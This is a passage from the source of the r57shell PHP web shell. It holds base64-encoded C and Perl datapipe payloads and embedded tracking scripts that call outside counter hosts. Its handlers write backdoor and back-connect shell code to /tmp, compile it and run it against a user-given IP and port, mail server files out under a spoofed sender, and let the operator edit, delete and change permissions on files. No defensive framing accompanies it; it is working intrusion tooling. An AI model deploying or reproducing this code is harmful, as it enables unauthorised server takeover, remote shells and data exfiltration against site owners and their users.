| 1377 | HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu | ||
| 1378 | dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 | ||
| 1379 | KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC | ||
| 1380 | ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI | ||
| 1381 | E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp | ||
| 1382 | Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs | ||
| 1383 | NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG | ||
| 1384 | J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL | ||
| 1385 | CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp | ||
| 1386 | dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo | ||
| 1387 | gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm | ||
| 1388 | lsZSk7DQogIHJldHVybiAwOw0KfQ=="; | ||
| 1389 | $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I | ||
| 1390 | CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl | ||
| 1391 | bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU | ||
| 1392 | gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol | ||
| 1393 | NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC | ||
| 1394 | iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy | ||
| 1395 | aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ | ||
| 1396 | SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 | ||
| 1397 | xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ | ||
| 1398 | WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN | ||
| 1399 | CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 | ||
| 1400 | yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi | ||
| 1401 | I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc | ||
| 1402 | m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp | ||
| 1403 | IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ | ||
| 1404 | lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW | ||
| 1405 | QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK | ||
| 1406 | CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g | ||
| 1407 | c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 | ||
| 1408 | NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG | ||
| 1409 | UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I | ||
| 1410 | DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs | ||
| 1411 | ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J | ||
| 1412 | 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; | ||
| 1413 | $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 | ||
| 1414 | JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l | ||
| 1415 | lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW | ||
| 1416 | FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L | ||
| 1417 | 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr | ||
| 1418 | J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR | ||
| 1419 | oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj | ||
| 1420 | xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO | ||
| 1421 | i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv | ||
| 1422 | dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB | ||
| 1423 | ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 | ||
| 1424 | hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; | ||
| 1425 | $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh | ||
| 1426 | IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl | ||
| 1427 | hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz | ||
| 1428 | tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa | ||
| 1429 | XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u | ||
| 1430 | 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV | ||
| 1431 | ybmV0LS0+"; | ||
| 1432 | echo $head; | ||
| 1433 | echo '</head>'; | ||
| 1434 | if(empty($_POST['cmd'])) { | ||
| 1435 | $serv = array(127,192,172,10); | ||
| 1436 | $addr=@explode('.', $_SERVER['SERVER_ADDR']); | ||
| 1437 | $current_version = str_replace('.','',$version); | ||
| 1438 | if (!in_array($addr[0], $serv)) { | ||
| 1439 | @print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; | ||
| 1440 | @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} | ||
| 1441 | echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> | ||
| 1442 | <tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).' | ||
| 1443 | <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> | ||
| 1444 | </font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; | ||
| 1445 | echo ws(2); | ||
| 1446 | echo "<b>".date ("d-m-Y H:i:s")."</b>"; | ||
| 1447 | echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; | ||
| 1448 | echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; | ||
| 1449 | echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; | ||
| 1450 | echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; | ||
| 1451 | if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } | ||
| 1452 | echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; | ||
| 1453 | echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; | ||
| 1454 | echo ws(2); | ||
| 1455 | echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); | ||
| 1456 | echo ws(2); | ||
| 1457 | echo "PHP version: <b>".@phpversion()."</b>"; | ||
| 1458 | $curl_on = @function_exists('curl_version'); | ||
| 1459 | echo ws(2); | ||
| 1460 | echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); | ||
| 1461 | echo ws(2); | ||
| 1462 | echo "MySQL: <b>"; | ||
| 1463 | $mysql_on = @function_exists('mysql_connect'); | ||
| 1464 | if($mysql_on){ | ||
| 1465 | echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } | ||
| 1466 | echo ws(2); | ||
| 1467 | echo "MSSQL: <b>"; | ||
| 1468 | $mssql_on = @function_exists('mssql_connect'); | ||
| 1469 | if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} | ||
| 1470 | echo ws(2); | ||
| 1471 | echo "PostgreSQL: <b>"; | ||
| 1472 | $pg_on = @function_exists('pg_connect'); | ||
| 1473 | if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} | ||
| 1474 | echo ws(2); | ||
| 1475 | echo "Oracle: <b>"; | ||
| 1476 | $ora_on = @function_exists('ocilogon'); | ||
| 1477 | if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} | ||
| 1478 | echo "<br>".ws(2); | ||
| 1479 | echo "Disable functions : <b>"; | ||
| 1480 | if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} | ||
| 1481 | $free = @diskfreespace($dir); | ||
| 1482 | if (!$free) {$free = 0;} | ||
| 1483 | $all = @disk_total_space($dir); | ||
| 1484 | if (!$all) {$all = 0;} | ||
| 1485 | $used = $all-$free; | ||
| 1486 | $used_percent = @round(100/($all/$free),2); | ||
| 1487 | echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; | ||
| 1488 | echo '</font></td></tr><table> | ||
| 1489 | <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> | ||
| 1490 | <tr><td align=right width=100>'; | ||
| 1491 | echo $font; | ||
| 1492 | if(!$windows){ | ||
| 1493 | echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; | ||
| 1494 | echo "</td><td>"; | ||
| 1495 | echo "<font face=Verdana size=-2 color=red><b>"; | ||
| 1496 | $uname = ex('uname -a'); | ||
| 1497 | echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); | ||
| 1498 | if(!$safe_mode){ | ||
| 1499 | $bsd1 = ex('sysctl -n kern.ostype'); | ||
| 1500 | $bsd2 = ex('sysctl -n kern.osrelease'); | ||
| 1501 | $lin1 = ex('sysctl -n kernel.ostype'); | ||
| 1502 | $lin2 = ex('sysctl -n kernel.osrelease'); | ||
| 1503 | } | ||
| 1504 | if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } | ||
| 1505 | else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } | ||
| 1506 | else { $sysctl = "-"; } | ||
| 1507 | echo ws(3).$sysctl."<br>"; | ||
| 1508 | echo ws(3).ex('echo $OSTYPE')."<br>"; | ||
| 1509 | echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; | ||
| 1510 | $id = ex('id'); | ||
| 1511 | echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); | ||
| 1512 | echo ws(3).$dir; | ||
| 1513 | echo ws(3).'( '.perms(@fileperms($dir)).' )'; | ||
| 1514 | echo "</b></font>"; | ||
| 1515 | } | ||
| 1516 | else | ||
| 1517 | { | ||
| 1518 | echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; | ||
| 1519 | echo "</td><td>"; | ||
| 1520 | echo "<font face=Verdana size=-2 color=red><b>"; | ||
| 1521 | echo ws(3).@substr(@php_uname(),0,120)."<br>"; | ||
| 1522 | echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; | ||
| 1523 | echo ws(3).@get_current_user()."<br>"; | ||
| 1524 | echo ws(3).$dir; | ||
| 1525 | echo "<br></font>"; | ||
| 1526 | } | ||
| 1527 | echo "</font>"; | ||
| 1528 | echo "</td></tr></table>"; | ||
| 1529 | if(empty($c1)||empty($c2)) { die(); } | ||
| 1530 | $f = '<br>'; | ||
| 1531 | $f .= base64_decode($c1); | ||
| 1532 | $f .= base64_decode($c2); | ||
| 1533 | if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") | ||
| 1534 | { | ||
| 1535 | $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); | ||
| 1536 | mr($language,$res); | ||
| 1537 | $_POST['cmd']=""; | ||
| 1538 | } | ||
| 1539 | if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) | ||
| 1540 | { | ||
| 1541 | if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } | ||
| 1542 | else | ||
| 1543 | { | ||
| 1544 | $filename = @basename($_POST['loc_file']); | ||
| 1545 | $filedump = @fread($file,@filesize($_POST['loc_file'])); | ||
| 1546 | fclose($file); | ||
| 1547 | $content_encoding=$mime_type=''; | ||
| 1548 | compress($filename,$filedump,$_POST['compress']); | ||
| 1549 | $attach = array( | ||
| 1550 | "name"=>$filename, | ||
| 1551 | "type"=>$mime_type, | ||
| 1552 | "content"=>$filedump | ||
| 1553 | ); | ||
| 1554 | if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } | ||
| 1555 | if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } | ||
| 1556 | $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); | ||
| 1557 | mr($language,$res); | ||
| 1558 | $_POST['cmd']=""; | ||
| 1559 | } | ||
| 1560 | } | ||
| 1561 | if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") | ||
| 1562 | { | ||
| 1563 | $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; | ||
| 1564 | } | ||
| 1565 | if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") | ||
| 1566 | { | ||
| 1567 | switch($_POST['what']) | ||
| 1568 | { | ||
| 1569 | case 'own': | ||
| 1570 | @chown($_POST['param1'],$_POST['param2']); | ||
| 1571 | break; | ||
| 1572 | case 'grp': | ||
| 1573 | @chgrp($_POST['param1'],$_POST['param2']); | ||
| 1574 | break; | ||
| 1575 | case 'mod': | ||
| 1576 | @chmod($_POST['param1'],intval($_POST['param2'], 8)); | ||
| 1577 | break; | ||
| 1578 | } | ||
| 1579 | $_POST['cmd']=""; | ||
| 1580 | } | ||
| 1581 | if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") | ||
| 1582 | { | ||
| 1583 | switch($_POST['what']) | ||
| 1584 | { | ||
| 1585 | case 'file': | ||
| 1586 | if($_POST['action'] == "create") | ||
| 1587 | { | ||
| 1588 | if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } | ||
| 1589 | else { | ||
| 1590 | fclose($file); | ||
| 1591 | $_POST['e_name'] = $_POST['mk_name']; | ||
| 1592 | $_POST['cmd']="edit_file"; | ||
| 1593 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; | ||
| 1594 | } | ||
| 1595 | } | ||
| 1596 | else if($_POST['action'] == "delete") | ||
| 1597 | { | ||
| 1598 | if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; | ||
| 1599 | $_POST['cmd']=""; | ||
| 1600 | } | ||
| 1601 | break; | ||
| 1602 | case 'dir': | ||
| 1603 | if($_POST['action'] == "create"){ | ||
| 1604 | if(mkdir($_POST['mk_name'])) | ||
| 1605 | { | ||
| 1606 | $_POST['cmd']=""; | ||
| 1607 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; | ||
| 1608 | } | ||
| 1609 | else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } | ||
| 1610 | } | ||
| 1611 | else if($_POST['action'] == "delete"){ | ||
| 1612 | if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; | ||
| 1613 | $_POST['cmd']=""; | ||
| 1614 | } | ||
| 1615 | break; | ||
| 1616 | } | ||
| 1617 | } | ||
| 1618 | if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) | ||
| 1619 | { | ||
| 1620 | if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } | ||
| 1621 | if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } | ||
| 1622 | else { | ||
| 1623 | echo $table_up3; | ||
| 1624 | echo $font; | ||
| 1625 | echo "<form name=save_file method=post>"; | ||
| 1626 | echo ws(3)."<b>".$_POST['e_name']."</b>"; | ||
| 1627 | echo "<div align=center><textarea name=e_text cols=121 rows=24>"; | ||
| 1628 | echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); | ||
| 1629 | fclose($file); | ||
| 1630 | echo "</textarea>"; | ||
| 1631 | echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; | ||
| 1632 | echo "<input type=hidden name=dir value=".$dir.">"; | ||
| 1633 | echo "<input type=hidden name=cmd value=save_file>"; | ||
| 1634 | echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); | ||
| 1635 | echo "</div>"; | ||
| 1636 | echo "</font>"; | ||
| 1637 | echo "</form>"; | ||
| 1638 | echo "</td></tr></table>"; | ||
| 1639 | exit(); | ||
| 1640 | } | ||
| 1641 | } | ||
| 1642 | if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") | ||
| 1643 | { | ||
| 1644 | if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } | ||
| 1645 | else { | ||
| 1646 | @fwrite($file,$_POST['e_text']); | ||
| 1647 | @fclose($file); | ||
| 1648 | $_POST['cmd']=""; | ||
| 1649 | echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; | ||
| 1650 | } | ||
| 1651 | } | ||
| 1652 | if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) | ||
| 1653 | { | ||
| 1654 | cf("/tmp/bd.c",$port_bind_bd_c); | ||
| 1655 | $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); | ||
| 1656 | @unlink("/tmp/bd.c"); | ||
| 1657 | $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); | ||
| 1658 | $_POST['cmd']="ps -aux | grep bd"; | ||
| 1659 | } | ||
| 1660 | if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) | ||
| 1661 | { | ||
| 1662 | cf("/tmp/bdpl",$port_bind_bd_pl); | ||
| 1663 | $p2=which("perl"); | ||
| 1664 | if(empty($p2)) $p2="perl"; | ||
| 1665 | $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); | ||
| 1666 | $_POST['cmd']="ps -aux | grep bdpl"; | ||
| 1667 | } | ||
| 1668 | if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) | ||
| 1669 | { | ||
| 1670 | cf("/tmp/back",$back_connect); | ||
| 1671 | $p2=which("perl"); | ||
| 1672 | if(empty($p2)) $p2="perl"; | ||
| 1673 | $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); | ||
| 1674 | $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; | ||
| 1675 | } | ||
| 1676 | if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) | ||
| 1677 | { | ||
| 1678 | cf("/tmp/back.c",$back_connect_c); | ||
| 1679 | $blah = ex("gcc -o /tmp/backc /tmp/back.c"); | ||
| 1680 | @unlink("/tmp/back.c"); | ||
| 1681 | $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); | ||
| 1682 | $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; | ||
| 1683 | } | ||
| 1684 | if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) | ||
| 1685 | { | ||
| 1686 | cf("/tmp/dp",$datapipe_pl); | ||
| 1687 | $p2=which("perl"); | ||
| 1688 | if(empty($p2)) $p2="perl"; | ||
| 1689 | $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); | ||
| 1690 | $_POST['cmd']="ps -aux | grep dp"; | ||
| 1691 | } | ||
| 1692 | if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) | ||
| 1693 | { | ||
| 1694 | cf("/tmp/dpc.c",$datapipe_c); | ||
| 1695 | $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); | ||
| 1696 | @unlink("/tmp/dpc.c"); | ||
| 1697 | $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); | ||
